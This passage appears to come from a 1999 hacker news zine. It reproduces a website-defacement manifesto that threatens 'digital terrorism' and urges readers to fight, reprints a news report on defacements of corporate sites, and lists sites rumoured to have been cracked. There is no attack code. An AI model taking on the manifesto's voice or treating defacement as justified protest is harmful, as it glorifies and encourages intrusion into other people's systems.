       America. All who profit from the misuse of the internet will fall victim to our upcoming reign of digital terrorism.
       
       Our privileged and highly skilled members will stop at nothing until our presence is felt nationwide. 
       
       Even your most sophisticated firewalls are useless. We will demonstrate this in the upcoming weeks. 
       
                         THE COMMERCIALIZATION OF THE INTERNET STOPS HERE
       
       
       
        KEVIN MITNICK IS CURRENTLY IMPRISONED FOR NOTHING MORE THAN HIS CURIOSITY AND DESIRE TO LEARN. KEVIN HAS BEEN
       ROTTING IN A PRISON CELL FOR 2 YEARS AND STILL HASN'T GONE TO TRIAL.
       
       ED CUMMINGS WAS THROWN IN PRISON FOR POSSESSING NOTHING OTHER THAN A COUPLE PIECES OF ELECTRONICS FROM
       RADIO SHACK. HIS COUNTRY DESTROYED HIS LIFE. WHILE IN PRISON CUMMINGS WAS SUBJECTED TO POOR PRISON CONDITIONS
       AND TREATED AS IF HE WERE A MURDERER. 
       
        The injustice doesn't just end with Kevin Mitnick, there are others who have been targets of the government. Ed Cummings (aka BernieS) went to Prison for
        possessing a timing crystal (used in various electronic devices and can be purchased at Radio Shack) along with a Tone Dialer (also obtainable at Radio Shack). If
        you put these two things together in the right way, it is possible to use this device to trick the phone company into believing that you inserted a quarter into a
        payphone. Mr. Cummings never had these parts combined, and therefore never committed any crime. But NO, the government said he committed a crime, and what
        happens? He goes to prison because they say so. It wasn't hard to see that things were going wrong for Mr. Cummings. A person being charged with manslaughter
        got bail set substantially lower than Mr. Cummings. Is it just me or does that sound ridiculous? 
       
       
       You can blame us
       Make every attempt to detain us
       You can make laws for us to break
       And "secure" your data for us to take
       A hacker, not by trade, but by BIRTHRIGHT.
       
       Some are born White, Some are born Black
        But the chaos chooses no color
       The chaos that encompasses our lives, all of our lives
       Driving us to HACK
       Deep inside, past the media, past the government, past ALL THE BULLSHIT:
       WE ARE ALL HACKERS
       
       Once it has you it never lets go.
       The conspiracy that saps our freedom, our humanity, our stability and security
       The self-propagating fruitless cycle that can only end by force
       If we must end this ourselves, we will stop at nothing
       This is a cry to America to GET IN TOUCH with the hacker inside YOU
       Take a step back and look around
       How much longer must my brothers suffer, for crimes subjectively declared ILLEGAL.
       
       All these fucking inbreds in office
        Stealing money from the country
       Writing bills to reduce your rights
       As the country just overlooks it
       PEOPLE OF AMERICA:
       IT'S TIME TO FIGHT.
       
       And FIGHT we WILL
       In the streets and from our homes
       In cyberspace and through the phones
       They are winning, by crushing our will
       Through this farce we call the media
       Through this farce we call capitalism
       Through this farce we call the JUSTICE SYSTEM
       Tell BernieS and Kevin Mitnick about Justice
       
       This is one strike, in what will soon become *MANY* 
       For those of you at home, now, reading this, we ask you
       Please, not for Hagis, Not for your country, but for YOURSELF
       FIGHT THE WHITE DOG OPPRESSOR
       Amen.
       
              
       http://www.computerworld.com/home/news.nsf/CWFlash/9904062hacker
       
       
       Canadian hackers attack 13 major corporate sites
       By Tom Diederich
                                             
       Several major corporate Web sites apparently were hacked into last Sunday
       evening by a group called the Yorkshire Posse. 
                                             
       The group said 13 companies were targeted to protest the arrest last April
       of Canadian Jason Mewhiney, who is suspected of breaking into a NASA Web
       site and causing tens of thousands of dollars in damage. 
       
       
       "I think they went for us because we were a high-profile site," said Sara
       Winge, a spokeswoman for information technology publisher O'Reilly &
       Associates Inc. in Sebastopol, Calif., one of the sites that was hit.
       "They were trying to get a message across about a Canadian hacker -- or
       cracker, I guess I should say -- who was being tried for computer crimes.
       But it didn't have anything to do with O'Reilly as a company." 
       
       
       The hacked sites were replaced with a page that proclaimed a "declaration
       of war against all who would challenge the freedom of Canadians with such
       ludicrous actions!" 
       
       
       The group claimed to have also hit Playboy.com, Sonymusic.com and a Sun
       Microsystems Inc. customer support site in Canada. Officials from those
       companies weren't available for comment at press time. 
       
       
       Winge said O'Reilly was contacting the other 12 sites to learn how the
       attacks were carried out. "We obviously can't give a lot of detail, but we
       have prevented it from reoccurring at this point," she said. 
       
       
       "All of our electronic-commerce offerings are on another server, which was
       not at all touched and has much heavier security," Winge added. 
       
       
       She said the attack occurred late Sunday night and was fixed by 9 a.m. 
       Monday morning. 
       
       
       
       -o-
       Subscribe: mail majordomo@repsec.com with "subscribe isn".
       Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
       
       
       April 5th
       Rumoured cracked:     
       <a href="http://www.deejay.it">www.deejay.it</a> (from irc)
       
       April 6th
       Cracked (HNN Rumours section)
       Here are the reported cracks for today
       
       <a href="http://www.cnmaiz.com.mx/">http://www.cnmaiz.com.mx/</a>
       <a href="http://www.weidenmiller.com">http://www.weidenmiller.com</a> 
       <a href="http://www.windowsplanet.com">http://www.windowsplanet.com</a> 
       <a href="http://www.cruzroja.org.mx">http://www.cruzroja.org.mx</a>
       <a href="http://www.oceanica.com.mx">http://www.oceanica.com.mx</a> 
       <a href="http://www.carnaval.com.mx">http://www.carnaval.com.mx</a> 
       <a href="http://www.alarmax.com.mx">http://www.alarmax.com.mx</a> 
       <a href="http://www.mazcity.com.mx">http://www.mazcity.com.mx</a> 
       <a href="http://www.exxor.com.mx">http://www.exxor.com.mx</a> 
       <a href="http://www.bandaelrecodo.com.mx">http://www.bandaelrecodo.com.mx</a> 
       <a href="http://www.ibalpe.com.mx">http://www.ibalpe.com.mx</a> 
       <a href="http://www.haciendadelmar.com.mx">http://www.haciendadelmar.com.mx</a> 
       <a href="http://www.lasflores.com.mx">http://www.lasflores.com.mx</a> 
       <a href="http://www.grupotecnica.com.mx">http://www.grupotecnica.com.mx</a> 
       <a href="http://www.mazatlangolfking.com.mx">http://www.mazatlangolfking.com.mx</a> 
      
       April 7th
       contributed by Anonymous (HNN rumours section)
       Cracked
       The following sites have been reported as cracked:
       <a href="http://www.wrestlingtitan.com/">http://www.wrestlingtitan.com/</a>
       <a href="http://www.redmanfamily.net">http://www.redmanfamily.net</a> 
       <a href="http://www.china.com/">http://www.china.com</a> 
       <a href="http://www.zavallis.com/">http://www.zavallis.com/</a>
       <a href="http://www.mxcert.org.mx">http://www.mxcert.org.mx</a> 
       <a href="http://www.affiliatedrecords.com/">http://www.affiliatedrecords.com/</a> 
       <a href="http://www.egallery.com/">http://www.egallery.com/</a>
       <a href="http://www.zapnow.com/">http://www.zapnow.com/</a>
       <a href="http://www.thecaboose.com/">http://www.thecaboose.com</a> 
       <a href="http://www.linux.org.mx/">http://www.linux.org.mx</a>
       
       April 8th
       Contributed by Anonymous (HNN rumours section)
       Cracked
       <a href="http://www.fibredust.com">http://www.fibredust.com</a>
       <a href="http://www.tentex.com">http://www.tentex.com</a>
     
       April 9th
       http://www.e-dreamshop.com 
       
       @HWA
       _________________________________________________________________________

  A.0                              APPENDICES
       _________________________________________________________________________



  A.1  PHACVW, sekurity, security, cyberwar links
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       The links are no longer maintained in this file; there is now a
      links section at the http://welcome.to/HWA.hax0r.news/ url, so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
      <a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>

      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
      <a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>

      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      <a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>
      
      
      Mirror sites:
      ~~~~~~~~~~~~
      http://www.csoft.net/~hwa/
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://www.genocide2600.com/~tattooman/zines/hwahaxornews/  


      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondents and others, please send in news site links that
      have security news from foreign countries for inclusion in this list,
      thanks... - Ed

      
          
      Belgium.......: http://bewoner.dma.be/cum/              <a href="http://bewoner.dma.be/cum/">Go there</a> 
      Brasil........: http://www.psynet.net/ka0z              <a href="http://www.psynet.net/ka0z/">Go there</a>
                      http://www.elementais.cjb.net           <a href="http://www.elementais.cjb.net/">Go there</a>
      Colombia......: http://www.cascabel.8m.com              <a href="http://www.cascabel.8m.com/">Go there</a>
                      http://www.intrusos.cjb.net             <a href="http://www.intrusos.cjb.net">Go there</a>
      Indonesia.....: http://www.k-elektronik.org/index2.html <a href="http://www.k-elektronik.org/index2.html">Go there</a>
                      http://members.xoom.com/neblonica/      <a href="http://members.xoom.com/neblonica/">Go there</a>
                      http://hackerlink.or.id/                <a href="http://hackerlink.or.id/">Go there</a>
      Netherlands...: http://security.pine.nl/                <a href="http://security.pine.nl/">Go there</a>       
      Russia........: http://www.tsu.ru/~eugene/              <a href="http://www.tsu.ru/~eugene/">Go there</a>
      Singapore.....: http://www.icepoint.com                 <a href="http://www.icepoint.com">Go there</a>

    Got a link for this section? email it to hwa@press.usmc.net and i'll
    review it and post it here if it merits it.

    @HWA
    

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

    © 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
    
        
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
       [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]